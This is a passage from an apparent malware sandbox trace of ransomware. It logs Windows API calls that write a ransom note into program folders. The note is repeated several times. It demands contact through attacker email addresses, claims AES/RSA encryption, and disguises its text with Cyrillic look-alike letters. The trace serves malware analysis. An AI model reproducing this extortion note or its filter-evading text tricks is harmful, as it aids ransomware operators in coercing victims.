rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0136.015] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0136.016] CloseHandle (hObject=0x1f0) returned 1 [0136.016] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\bg85_info.rtf")) returned 0xffffffff [0136.016] GetLastError () returned 0x2 [0136.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.017] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.017] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 